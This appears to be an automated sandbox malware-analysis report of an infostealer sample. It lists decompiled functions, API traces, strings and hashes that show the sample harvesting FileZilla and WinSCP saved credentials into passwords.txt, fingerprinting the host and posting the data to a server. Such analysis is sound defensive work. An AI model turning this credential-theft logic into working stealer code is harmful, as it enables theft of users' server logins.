                                                                                                                                                                                                                            • Instruction Fuzzy Hash: FC42B5719001699BDF21FB21DC45ADDB7B9BF04348F0085E6A589B3162CEB46FC69F88
                                                                                                                                                                                                                            Function 0040E6A4 Relevance: 70.3, APIs: 30, Strings: 10, Instructions: 289stringmemoryCOMMON
                                                                                                                                                                                                                            Download Yara Rule

                                                                                                                                                                                                                            Control-flow Graph

                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                              • Part of subcall function 004104BC: lstrcpyA.KERNEL32(00000000,00000000,?,004170BD,004366BA,?,?,?,?,004185D1), ref: 004104E2
                                                                                                                                                                                                                              • Part of subcall function 00411D91: SHGetFolderPathA.SHELL32(00000000,?,00000000,00000000,?,?,?), ref: 00411DD2
                                                                                                                                                                                                                              • Part of subcall function 0041059C: lstrcpyA.KERNEL32(00000000,?,0000000C,0041762B,004366D6), ref: 004105CA
                                                                                                                                                                                                                              • Part of subcall function 0041059C: lstrcatA.KERNEL32(?,?), ref: 004105D4
                                                                                                                                                                                                                              • Part of subcall function 00410562: lstrcpyA.KERNEL32(00000000,?,00000000,004170FC,00436C20,00000000,004366BA,?,?,?,?,004185D1), ref: 00410592
                                                                                                                                                                                                                              • Part of subcall function 004105DE: lstrlenA.KERNEL32(?,00000000,?,?,?,?,004170DE,00436C20,00000000,004366BA,?,?,?,?,004185D1), ref: 004105F2
                                                                                                                                                                                                                              • Part of subcall function 004105DE: lstrcpyA.KERNEL32(00000000,?,?,?,?,?,004170DE,00436C20,00000000,004366BA,?,?,?,?,004185D1), ref: 0041061A
                                                                                                                                                                                                                              • Part of subcall function 004105DE: lstrcatA.KERNEL32(?,00000000,?,?,?,?,004170DE,00436C20,00000000,004366BA,?,?,?,?,004185D1), ref: 00410625
                                                                                                                                                                                                                              • Part of subcall function 004104EE: lstrcpyA.KERNEL32(00000000,?,?,00401D07,?,00417663), ref: 0041050D
                                                                                                                                                                                                                              • Part of subcall function 00407FAC: CreateFileA.KERNEL32(?,80000000,00000001,00000000,00000003,00000000,00000000,00000000,?,?,?,?,0040E72B,?,?,?), ref: 00407FC7
                                                                                                                                                                                                                              • Part of subcall function 00407FAC: GetFileSizeEx.KERNEL32(00000000,?,?,?,?,?,0040E72B,?,?,?), ref: 00407FDE
                                                                                                                                                                                                                              • Part of subcall function 00407FAC: LocalAlloc.KERNEL32(00000040,?,?,?,?,?,0040E72B,?,?,?), ref: 00407FF5
                                                                                                                                                                                                                              • Part of subcall function 00407FAC: ReadFile.KERNEL32(?,00000000,?,?,00000000,?,?,?,?,0040E72B,?,?,?), ref: 0040800C
                                                                                                                                                                                                                              • Part of subcall function 00407FAC: CloseHandle.KERNEL32(?,?,?,?,?,0040E72B,?,?,?), ref: 00408034
                                                                                                                                                                                                                              • Part of subcall function 00411DF4: LocalAlloc.KERNEL32(00000040,00000001,?,?,?,00416973,?), ref: 00411E0C
                                                                                                                                                                                                                            • strtok_s.MSVCRT ref: 0040E753
                                                                                                                                                                                                                            • GetProcessHeap.KERNEL32(00000000,000F423F,004368FF,004368FE,004368EF,004368EE), ref: 0040E799
                                                                                                                                                                                                                            • HeapAlloc.KERNEL32(00000000), ref: 0040E7A0
                                                                                                                                                                                                                            • StrStrA.SHLWAPI(00000000,<Host>), ref: 0040E7B4
                                                                                                                                                                                                                            • lstrlenA.KERNEL32(00000000), ref: 0040E7BF
                                                                                                                                                                                                                            • StrStrA.SHLWAPI(00000000,<Port>), ref: 0040E7F3
                                                                                                                                                                                                                            • lstrlenA.KERNEL32(00000000), ref: 0040E7FE
                                                                                                                                                                                                                            • StrStrA.SHLWAPI(00000000,<User>), ref: 0040E82C
                                                                                                                                                                                                                            • lstrlenA.KERNEL32(00000000), ref: 0040E837
                                                                                                                                                                                                                            • StrStrA.SHLWAPI(00000000,<Pass encoding="base64">), ref: 0040E865
                                                                                                                                                                                                                            • lstrlenA.KERNEL32(00000000), ref: 0040E870
                                                                                                                                                                                                                            • lstrlenA.KERNEL32(?), ref: 0040E8D6
                                                                                                                                                                                                                            • lstrlenA.KERNEL32(?), ref: 0040E8EA
                                                                                                                                                                                                                            • lstrlenA.KERNEL32(0040EC91), ref: 0040EA12
                                                                                                                                                                                                                              • Part of subcall function 00416ED9: CreateThread.KERNEL32(00000000,00000000,00416E08,?,00000000,00000000), ref: 00416F78
                                                                                                                                                                                                                              • Part of subcall function 00416ED9: WaitForSingleObject.KERNEL32(00000000,000003E8), ref: 00416F80
                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000002.00000002.2685053359.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                            • Associated: 00000002.00000002.2685053359.0000000000463000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000002.00000002.2685053359.0000000000467000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000002.00000002.2685053359.000000000046B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000002.00000002.2685053359.000000000055A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000002.00000002.2685053359.000000000055D000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000002.00000002.2685053359.0000000000563000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000002.00000002.2685053359.0000000000582000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000002.00000002.2685053359.00000000005A1000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000002.00000002.2685053359.000000000063A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000002.00000002.2685053359.0000000000670000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_400000_UMrFwHyjUi.jbxd
                                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: lstrlen$lstrcpy$AllocFile$CreateHeapLocallstrcat$CloseFolderHandleObjectPathProcessReadSingleSizeThreadWaitstrtok_s
                                                                                                                                                                                                                            • String ID: <Host>$<Pass encoding="base64">$<Port>$<User>$Host: $Login: $Password: $Soft: FileZilla$\AppData\Roaming\FileZilla\recentservers.xml$passwords.txt
                                                                                                                                                                                                                            • API String ID: 4146028692-935134978
                                                                                                                                                                                                                            • Opcode ID: 2043cfb4df27b7f6be8dd36fcbef004bec977de90b96742460162cb029baf312
                                                                                                                                                                                                                            • Instruction ID: 47ce7727287e9f9e0db6c8b5a9533b4c3b5eb338c4ff8911e2f23da32c202c50
                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 2043cfb4df27b7f6be8dd36fcbef004bec977de90b96742460162cb029baf312
                                                                                                                                                                                                                            • Instruction Fuzzy Hash: C4A16372A00219BBCF01FBA1DD4AACD7779AF08705F105426F601F31A1DB79AF858B99
                                                                                                                                                                                                                            Function 0040E15B Relevance: 56.3, APIs: 18, Strings: 14, Instructions: 325registryCOMMON
                                                                                                                                                                                                                            Download Yara Rule

                                                                                                                                                                                                                            Control-flow Graph

                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                            • _memset.LIBCMT ref: 0040E18C
                                                                                                                                                                                                                            • _memset.LIBCMT ref: 0040E1AC
                                                                                                                                                                                                                            • _memset.LIBCMT ref: 0040E1BD
                                                                                                                                                                                                                            • _memset.LIBCMT ref: 0040E1CE
                                                                                                                                                                                                                            • RegOpenKeyExA.KERNEL32(80000001,Software\Martin Prikryl\WinSCP 2\Configuration,00000000,00000001,?,?,?,?,?,?,?,?,?,?,?,?), ref: 0040E202
                                                                                                                                                                                                                            • RegGetValueA.ADVAPI32(?,Security,UseMasterPassword,00000010,00000000,?,?), ref: 0040E233
                                                                                                                                                                                                                            • RegCloseKey.ADVAPI32(?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 0040E24B
                                                                                                                                                                                                                            • RegCloseKey.ADVAPI32(?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 0040E272
                                                                                                                                                                                                                            • RegOpenKeyExA.ADVAPI32(80000001,Software\Martin Prikryl\WinSCP 2\Sessions,00000000,00000009,?,?,?,?,?,?,?,?,?,?,?,?), ref: 0040E292
                                                                                                                                                                                                                            • RegEnumKeyExA.ADVAPI32(?,00000000,?,00000104,00000000,00000000,00000000,00000000), ref: 0040E2B5
                                                                                                                                                                                                                            • RegGetValueA.ADVAPI32(?,?,HostName,00000002,00000000,?,?,Host: ,Soft: WinSCP,004368D7), ref: 0040E34E
                                                                                                                                                                                                                            • RegGetValueA.ADVAPI32(?,?,PortNumber,0000FFFF,00000000,?,?,?), ref: 0040E3AE
                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000002.00000002.2685053359.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                            • Associated: 00000002.00000002.2685053359.0000000000463000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000002.00000002.2685053359.0000000000467000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000002.00000002.2685053359.000000000046B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000002.00000002.2685053359.000000000055A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000002.00000002.2685053359.000000000055D000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000002.00000002.2685053359.0000000000563000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000002.00000002.2685053359.0000000000582000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000002.00000002.2685053359.00000000005A1000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000002.00000002.2685053359.000000000063A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000002.00000002.2685053359.0000000000670000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_400000_UMrFwHyjUi.jbxd
                                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: _memset$Value$CloseOpen$Enum
                                                                                                                                                                                                                            • String ID: Login: $:22$Host: $HostName$Password$Password: $PortNumber$Security$Soft: WinSCP$Software\Martin Prikryl\WinSCP 2\Configuration$Software\Martin Prikryl\WinSCP 2\Sessions$UseMasterPassword$UserName$passwords.txt
                                                                                                                                                                                                                            • API String ID: 463713726-2798830873
                                                                                                                                                                                                                            • Opcode ID: 1b23a7cec8ce1a068f0904835dff8764a5d3e31adcc74daa50b1addd64c79da9
                                                                                                                                                                                                                            • Instruction ID: 3de73c6830c2fad38347e0384e5faadb251f520f0b3c27047f30c6be6412ffb3
                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 1b23a7cec8ce1a068f0904835dff8764a5d3e31adcc74daa50b1addd64c79da9
                                                                                                                                                                                                                            • Instruction Fuzzy Hash: D3D1F6B191012DABDB20EB91DC82BD9B779AF04348F1054EBA508B3091DAB47FC9CF65
                                                                                                                                                                                                                            Function 00405F39 Relevance: 53.0, APIs: 20, Strings: 10, Instructions: 466networkstringmemoryCOMMON
                                                                                                                                                                                                                            Download Yara Rule

                                                                                                                                                                                                                            Control-flow Graph

                                                                                                                                                                                                                            • Executed
                                                                                                                                                                                                                            • Not Executed
                                                                                                                                                                                                                            control_flow_graph 568 405f39-405ffe call 4104ee call 404ab6 call 4104bc * 5 InternetOpenA StrCmpCA 583 406000 568->583 584 406006-40600c 568->584 583->584 585 406012-40619c call 411c1f call 41059c call 410562 call 402920 * 2 call 4105de call 410562 call 402920 call 4105de call 410562 call 402920 call 41059c call 410562 call 402920 call 4105de call 410562 call 402920 call 4105de call 410562 call 402920 call 4105de call 41059c call 410562 call 402920 * 2 InternetConnectA 584->585 586 4066ff-406727 InternetCloseHandle call 408048 584->586 585->586 662 4061a2-4061dc HttpOpenRequestA 585->662 592 406766-4067ec call 402920 * 4 call 401cde call 402920 call 41d05a 586->592 593 406729-406761 call 41051e call 4105de call 410562 call 402920 586->593 593->592 663 4061e2-4061e8 662->663 664 4066f3-4066f9 InternetCloseHandle 662->664 665 406206-406690 call 4105de call 410562 call 402920 call 41059c call 410562 call 402920 call 4105de call 410562 call 402920 call 4105de call 410562 call 402920 call 4105de call 410562 call 402920 call 4105de call 410562 call 402920 call 41059c call 410562 call 402920 call 4105de call 410562 call 402920 call 4105de call 410562 call 402920 call 41059c call 410562 call 402920 call 4105de call 410562 call 402920 call 4105de call 410562 call 402920 call 4105de call 410562 call 402920 call 4105de call 410562 call 402920 call 4105de call 410562 call 402920 call 4105de call 410562 call 402920 call 4105de call 410562 call 402920 call 41059c call 410562 call 402920 call 4105de call 410562 call 402920 call 4105de call 410562 call 402920 call 4105de call 410562 call 402920 call 4105de call 410562 call 402920 call 41059c call 410562 call 402920 lstrlenA * 2 GetProcessHeap HeapAlloc lstrlenA call 4270a0 lstrlenA * 2 call 4270a0 lstrlenA HttpSendRequestA 663->665 666 4061ea-406200 InternetSetOptionA 663->666 664->586 809 4066d2-4066ea InternetReadFile 665->809 666->665 810 406692-40669a 809->810 811 4066ec-4066ed InternetCloseHandle 809->811 810->811 812 40669c-4066cd call 4105de call 410562 call 402920 810->812 811->664 812->809
                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                              • Part of subcall function 004104EE: lstrcpyA.KERNEL32(00000000,?,?,00401D07,?,00417663), ref: 0041050D
                                                                                                                                                                                                                              • Part of subcall function 00404AB6: ??_U@YAPAXI@Z.MSVCRT(00000400), ref: 00404AE8
                                                                                                                                                                                                                              • Part of subcall function 00404AB6: ??_U@YAPAXI@Z.MSVCRT(00000400), ref: 00404AEE
                                                                                                                                                                                                                              • Part of subcall function 00404AB6: ??_U@YAPAXI@Z.MSVCRT(00000400), ref: 00404AF4
                                                                                                                                                                                                                              • Part of subcall function 00404AB6: lstrlenA.KERNEL32(000000FF,00000000,?), ref: 00404B06
                                                                                                                                                                                                                              • Part of subcall function 00404AB6: InternetCrackUrlA.WININET(000000FF,00000000), ref: 00404B0E
                                                                                                                                                                                                                              • Part of subcall function 004104BC: lstrcpyA.KERNEL32(00000000,00000000,?,004170BD,004366BA,?,?,?,?,004185D1), ref: 004104E2
                                                                                                                                                                                                                            • InternetOpenA.WININET(?,00000001,00000000,00000000,00000000), ref: 00405FD8
                                                                                                                                                                                                                            • StrCmpCA.SHLWAPI(?), ref: 00405FF6
                                                                                                                                                                                                                            • InternetConnectA.WININET(?,?,?,00000000,00000000,00000003,00000000,00000000), ref: 0040618E
                                                                                                                                                                                                                            • HttpOpenRequestA.WININET(?,?,00000000,00000000,?,00000000), ref: 004061D2
                                                                                                                                                                                                                            • lstrlenA.KERNEL32(?,",mode,004378D0,------,004378C4,0b3bd69430b7d827b107ba2ed809207d,",build_id,004378AC,------,004378A0,",00437894,------), ref: 004065FD
                                                                                                                                                                                                                            • lstrlenA.KERNEL32(?), ref: 0040660C
                                                                                                                                                                                                                            • GetProcessHeap.KERNEL32(00000000,00000000), ref: 00406617
                                                                                                                                                                                                                            • HeapAlloc.KERNEL32(00000000), ref: 0040661E
                                                                                                                                                                                                                            • lstrlenA.KERNEL32(?), ref: 0040662B
                                                                                                                                                                                                                            • _memmove.LIBCMT ref: 00406639
                                                                                                                                                                                                                            • lstrlenA.KERNEL32(?), ref: 00406647
                                                                                                                                                                                                                            • lstrlenA.KERNEL32(?,?,00000000), ref: 00406655
                                                                                                                                                                                                                            • _memmove.LIBCMT ref: 00406662
                                                                                                                                                                                                                            • lstrlenA.KERNEL32(?,?,00000000), ref: 00406677
                                                                                                                                                                                                                            • HttpSendRequestA.WININET(00000000,?,00000000), ref: 00406685
                                                                                                                                                                                                                            • InternetReadFile.WININET(00000000,?,000000C7,?), ref: 004066E2
                                                                                                                                                                                                                            • InternetCloseHandle.WININET(00000000), ref: 004066ED
                                                                                                                                                                                                                            • InternetCloseHandle.WININET(?), ref: 004066F9
                                                                                                                                                                                                                            • InternetCloseHandle.WININET(?), ref: 00406705
                                                                                                                                                                                                                            • InternetSetOptionA.WININET(00000000,0000001F,00010300,00000004), ref: 00406200
                                                                                                                                                                                                                              • Part of subcall function 004105DE: lstrlenA.KERNEL32(?,00000000,?,?,?,?,004170DE,00436C20,00000000,004366BA,?,?,?,?,004185D1), ref: 004105F2
                                                                                                                                                                                                                              • Part of subcall function 004105DE: lstrcpyA.KERNEL32(00000000,?,?,?,?,?,004170DE,00436C20,00000000,004366BA,?,?,?,?,004185D1), ref: 0041061A
                                                                                                                                                                                                                              • Part of subcall function 004105DE: lstrcatA.KERNEL32(?,00000000,?,?,?,?,004170DE,00436C20,00000000,004366BA,?,?,?,?,004185D1), ref: 00410625
                                                                                                                                                                                                                              • Part of subcall function 00410562: lstrcpyA.KERNEL32(00000000,?,00000000,004170FC,00436C20,00000000,004366BA,?,?,?,?,004185D1), ref: 00410592
                                                                                                                                                                                                                              • Part of subcall function 0041059C: lstrcpyA.KERNEL32(00000000,?,0000000C,0041762B,004366D6), ref: 004105CA
                                                                                                                                                                                                                              • Part of subcall function 0041059C: lstrcatA.KERNEL32(?,?), ref: 004105D4
                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000002.00000002.2685053359.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                            • Associated: 00000002.00000002.2685053359.0000000000463000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000002.00000002.2685053359.0000000000467000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000002.00000002.2685053359.000000000046B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000002.00000002.2685053359.000000000055A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000002.00000002.2685053359.000000000055D000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000002.00000002.2685053359.0000000000563000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000002.00000002.2685053359.0000000000582000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000002.00000002.2685053359.00000000005A1000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000002.00000002.2685053359.000000000063A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000002.00000002.2685053359.0000000000670000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_400000_UMrFwHyjUi.jbxd
                                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: Internetlstrlen$lstrcpy$CloseHandle$HeapHttpOpenRequest_memmovelstrcat$AllocConnectCrackFileOptionProcessReadSend
                                                                                                                                                                                                                            • String ID: "$"$"$------$------$------$------$0b3bd69430b7d827b107ba2ed809207d$build_id$mode
                                                                                                                                                                                                                            • API String ID: 3702379033-3877027458
                                                                                                                                                                                                                            • Opcode ID: c38a785da26e95155da7254909f85e26fadc997b3220c267df7f6dd31fe9c288
                                                                                                                                                                                                                            • Instruction ID: 8eebda12c3b5d708eb83a5d718eaa1b7ac2e3c0f0341b99d1b213d601621e23a
                                                                                                                                                                                                                            • Opcode Fuzzy Hash: c38a785da26e95155da7254909f85e26fadc997b3220c267df7f6dd31fe9c288
                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 4522A5719001699BCF21EB61CD46BCDB775AF08748F0184E7A64D73162CAB86FCA8F58
                                                                                                                                                                                                                            Function 00413BC6 Relevance: 49.7, APIs: 2, Strings: 26, Instructions: 674stringCOMMON
                                                                                                                                                                                                                            Download Yara Rule

                                                                                                                                                                                                                            Control-flow Graph

                                                                                                                                                                                                                            • Executed
                                                                                                                                                                                                                            • Not Executed
                                                                                                                                                                                                                            control_flow_graph 818 413bc6-4145e5 call 4104bc call 4105de call 410562 call 402920 call 4105de call 410562 call 402920 call 4105de call 410562 call 402920 call 4105de call 410562 call 402920 call 4105de call 410562 call 402920 call 410c95 call 4105de call 410562 call 402920 call 4105de call 410562 call 402920 call 4105de call 410562 call 402920 call 4115a9 call 4105de call 410562 call 402920 call 4105de call 410562 call 402920 call 4105de call 410562 call 402920 call 411659 call 41059c call 410562 call 402920 * 2 call 4105de call 410562 call 402920 call 4105de call 410562 call 402920 call 410977 call 41059c call 410562 call 402920 * 2 call 4105de call 410562 call 402920 call 4105de call 410562 call 402920 GetCurrentProcessId call 41221f call 41059c call 410562 call 402920 * 2 call 4105de call 410562 call 402920 call 4105de call 410562 call 402920 call 4105de call 410562 call 402920 call 4105de call 410562 call 402920 call 410b05 call 4105de call 410562 call 402920 call 4105de call 410562 call 402920 call 4105de call 410562 call 402920 call 4117dc call 41059c call 410562 call 402920 * 2 call 4105de call 410562 call 402920 call 4105de call 410562 call 402920 call 41196c call 41059c call 410562 call 402920 * 2 call 4105de call 410562 call 402920 call 4105de call 410562 call 402920 call 410c5a call 4105de call 410562 call 402920 call 4105de call 410562 call 402920 call 4105de call 410562 call 402920 call 410c28 call 4105de call 410562 call 402920 call 4105de call 410562 call 402920 call 4105de call 410562 call 402920 call 411538 call 41059c call 410562 call 402920 * 2 call 4105de call 410562 call 402920 call 4105de call 410562 call 402920 call 410db0 call 41059c call 410562 call 402920 * 2 call 4105de call 410562 call 402920 call 4105de call 410562 call 402920 call 410c95 call 4105de call 410562 call 402920 call 4105de call 410562 call 402920 call 4105de call 410562 call 402920 call 410d03 call 4105de call 410562 call 402920 call 4105de call 410562 call 402920 call 4105de call 410562 call 402920 call 4105de call 410562 call 402920 call 410f26 call 4105de call 410562 call 402920 call 4105de call 410562 call 402920 call 4105de call 410562 call 402920 call 410fdc call 4105de call 410562 call 402920 call 4105de call 410562 call 402920 call 4105de call 410562 call 402920 call 410f8f call 4105de call 410562 call 402920 call 4105de call 410562 call 402920 call 4105de call 410562 call 402920 call 4110ee call 4105de call 410562 call 402920 call 4105de call 410562 call 402920 call 4105de call 410562 call 402920 call 411167 call 41059c call 410562 call 402920 * 2 call 4105de call 410562 call 402920 call 4105de call 410562 call 402920 call 41147a call 41059c call 410562 call 402920 * 2 call 4105de call 410562 call 402920 call 4105de call 410562 call 402920 call 4111d8 call 41059c call 410562 call 402920 * 2 call 4111d8 call 41059c call 410562 call 402920 * 2 call 4105de call 410562 call 402920 call 401cfd lstrlenA call 4104bc call 416ed9 call 402920 * 2 call 401cde
                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                              • Part of subcall function 004104BC: lstrcpyA.KERNEL32(00000000,00000000,?,004170BD,004366BA,?,?,?,?,004185D1), ref: 004104E2
                                                                                                                                                                                                                              • Part of subcall function 004105DE: lstrlenA.KERNEL32(?,00000000,?,?,?,?,004170DE,00436C20,00000000,004366BA,?,?,?,?,004185D1), ref: 004105F2
                                                                                                                                                                                                                              • Part of subcall function 004105DE: lstrcpyA.KERNEL32(00000000,?,?,?,?,?,004170DE,00436C20,00000000,004366BA,?,?,?,?,004185D1), ref: 0041061A
                                                                                                                                                                                                                              • Part of subcall function 004105DE: lstrcatA.KERNEL32(?,00000000,?,?,?,?,004170DE,00436C20,00000000,004366BA,?,?,?,?,004185D1), ref: 00410625
                                                                                                                                                                                                                              • Part of subcall function 00410562: lstrcpyA.KERNEL32(00000000,?,00000000,004170FC,00436C20,00000000,004366BA,?,?,?,?,004185D1), ref: 00410592
                                                                                                                                                                                                                              • Part of subcall function 00410C95: GetProcessHeap.KERNEL32(00000000,00000104,?,Version: ,004365B6,?,?,?), ref: 00410CAD
                                                                                                                                                                                                                              • Part of subcall function 00410C95: HeapAlloc.KERNEL32(00000000), ref: 00410CB4
                                                                                                                                                                                                                              • Part of subcall function 00410C95: GetLocalTime.KERNEL32(?), ref: 00410CC0
                                                                                                                                                                                                                              • Part of subcall function 00410C95: wsprintfA.USER32 ref: 00410CEB
                                                                                                                                                                                                                              • Part of subcall function 004115A9: _memset.LIBCMT ref: 004115DC
                                                                                                                                                                                                                              • Part of subcall function 004115A9: RegOpenKeyExA.KERNEL32(80000002,SOFTWARE\Microsoft\Cryptography,00000000,00020119,?,?,?,?), ref: 004115FB
                                                                                                                                                                                                                              • Part of subcall function 004115A9: RegQueryValueExA.KERNEL32(?,MachineGuid,00000000,00000000,?,000000FF,?,?,?), ref: 00411620
                                                                                                                                                                                                                              • Part of subcall function 004115A9: RegCloseKey.ADVAPI32(?,?,?,?), ref: 0041162C
                                                                                                                                                                                                                              • Part of subcall function 004115A9: CharToOemA.USER32(?,?), ref: 00411640
                                                                                                                                                                                                                              • Part of subcall function 00411659: GetCurrentHwProfileA.ADVAPI32(?), ref: 00411674
                                                                                                                                                                                                                              • Part of subcall function 00411659: _memset.LIBCMT ref: 004116A3
                                                                                                                                                                                                                              • Part of subcall function 00411659: lstrcatA.KERNEL32(?,00000000,?,?,?,?,?), ref: 004116CB
                                                                                                                                                                                                                              • Part of subcall function 00411659: lstrcatA.KERNEL32(?,00436ED4,?,?,?,?,?), ref: 004116E8
                                                                                                                                                                                                                              • Part of subcall function 0041059C: lstrcpyA.KERNEL32(00000000,?,0000000C,0041762B,004366D6), ref: 004105CA
                                                                                                                                                                                                                              • Part of subcall function 0041059C: lstrcatA.KERNEL32(?,?), ref: 004105D4
                                                                                                                                                                                                                              • Part of subcall function 00410977: GetWindowsDirectoryA.KERNEL32(?,00000104,?,?,00000000), ref: 004109AA
                                                                                                                                                                                                                              • Part of subcall function 00410977: GetVolumeInformationA.KERNEL32(?,00000000,00000000,?,00000000,00000000,00000000,00000000,?,?,00000000), ref: 004109EA
                                                                                                                                                                                                                              • Part of subcall function 00410977: GetProcessHeap.KERNEL32(00000000,00000104,?,?,00000000), ref: 00410A3F
                                                                                                                                                                                                                              • Part of subcall function 00410977: HeapAlloc.KERNEL32(00000000,?,?,00000000), ref: 00410A46
                                                                                                                                                                                                                            • GetCurrentProcessId.KERNEL32(Path: ,00436884,HWID: ,00436878,GUID: ,0043686C,00000000,MachineID: ,0043685C,00000000,Date: ,00436850,0043684C,11.1,Version: ,004365B6), ref: 00413E1B
                                                                                                                                                                                                                              • Part of subcall function 0041221F: OpenProcess.KERNEL32(00000410,00000000,*>A,00000000,?), ref: 00412241
                                                                                                                                                                                                                              • Part of subcall function 0041221F: K32GetModuleFileNameExA.KERNEL32(00000000,00000000,?,00000104), ref: 0041225C
                                                                                                                                                                                                                              • Part of subcall function 0041221F: CloseHandle.KERNEL32(00000000), ref: 00412263
                                                                                                                                                                                                                              • Part of subcall function 00410B05: GetProcessHeap.KERNEL32(00000000,00000104,00000000,?,?,?,00413ED5,Windows: ,004368A8), ref: 00410B19
                                                                                                                                                                                                                              • Part of subcall function 00410B05: HeapAlloc.KERNEL32(00000000,?,?,?,00413ED5,Windows: ,004368A8), ref: 00410B20
                                                                                                                                                                                                                              • Part of subcall function 004117DC: __EH_prolog3_catch_GS.LIBCMT ref: 004117E3
                                                                                                                                                                                                                              • Part of subcall function 004117DC: CoInitializeEx.OLE32(00000000,00000000,0000004C,00413F39,Install Date: ,004368B8,00000000,Windows: ,004368A8,Work Dir: In memory,00436890), ref: 004117F4
                                                                                                                                                                                                                              • Part of subcall function 004117DC: CoInitializeSecurity.OLE32(00000000,000000FF,00000000,00000000,00000000,00000003,00000000,00000000,00000000), ref: 00411805
                                                                                                                                                                                                                              • Part of subcall function 004117DC: CoCreateInstance.OLE32(00432F00,00000000,00000001,00432E30,?), ref: 0041181F
                                                                                                                                                                                                                              • Part of subcall function 004117DC: CoSetProxyBlanket.COMBASE(?,0000000A,00000000,00000000,00000003,00000003,00000000,00000000), ref: 00411855
                                                                                                                                                                                                                              • Part of subcall function 004117DC: VariantInit.OLEAUT32(?), ref: 004118B0
                                                                                                                                                                                                                              • Part of subcall function 0041196C: __EH_prolog3_catch.LIBCMT ref: 00411973
                                                                                                                                                                                                                              • Part of subcall function 0041196C: CoInitializeEx.OLE32(00000000,00000000,00000030,00413FA7,?,AV: ,004368CC,Install Date: ,004368B8,00000000,Windows: ,004368A8,Work Dir: In memory,00436890), ref: 00411982
                                                                                                                                                                                                                              • Part of subcall function 0041196C: CoInitializeSecurity.OLE32(00000000,000000FF,00000000,00000000,00000000,00000003,00000000,00000000,00000000), ref: 00411993
                                                                                                                                                                                                                              • Part of subcall function 0041196C: CoCreateInstance.OLE32(00432F00,00000000,00000001,00432E30,?), ref: 004119AD
                                                                                                                                                                                                                              • Part of subcall function 0041196C: CoSetProxyBlanket.COMBASE(?,0000000A,00000000,00000000,00000003,00000003,00000000,00000000), ref: 004119E3
                                                                                                                                                                                                                              • Part of subcall function 0041196C: VariantInit.OLEAUT32(?), ref: 00411A32
